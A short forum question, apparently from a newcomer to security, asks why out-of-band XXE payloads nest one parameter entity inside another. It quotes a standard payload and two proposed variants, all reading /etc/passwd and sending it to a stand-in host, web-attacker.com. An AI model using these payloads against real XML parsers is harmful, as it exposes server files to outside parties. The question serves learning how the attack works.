15Oca
I’m not sure why the different XXE injection payloads follow a specific pattern
I'm quite new to XXE attacks so please bear with me, when I look at the different payloads to get a OOB XXE they all look like the following (external DTD) :
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
my question is: why not doing something like:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval SYSTEM 'http://web-attacker.com/?x=%file;'>
%eval;
even if it will throw an error but I think it will do the job which is sending the file to our server
or we can do:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY eval SYSTEM 'http://web-attacker.com/?x=%file;'>
&eval; in the xml
so why we need a parameter entity inside another one